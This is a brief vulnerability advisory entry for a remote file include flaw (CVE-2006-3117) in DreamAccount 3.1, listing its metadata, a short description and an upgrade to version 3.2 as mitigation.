vendor: DreamAccount
by: Aesthetico
CVSS: 7.5 HIGH
Remote File Include
CWE: 98
Product Name: DreamAccount
Affected Version From: 3.1
Affected Version To: 3.1
Patch Exists: YES
Related CVE: CVE-2006-3117
CPE: a:dreamcost.com:dreamaccount:3.1
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006
DreamAccount <= 3.1 - Remote File Include Vulnerability
DreamAccount versions 3.1 and prior are prone to a remote file-include vulnerability because they fail to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code in the context of the webserver process.
Mitigation:
Upgrade to DreamAccount version 3.2 or later.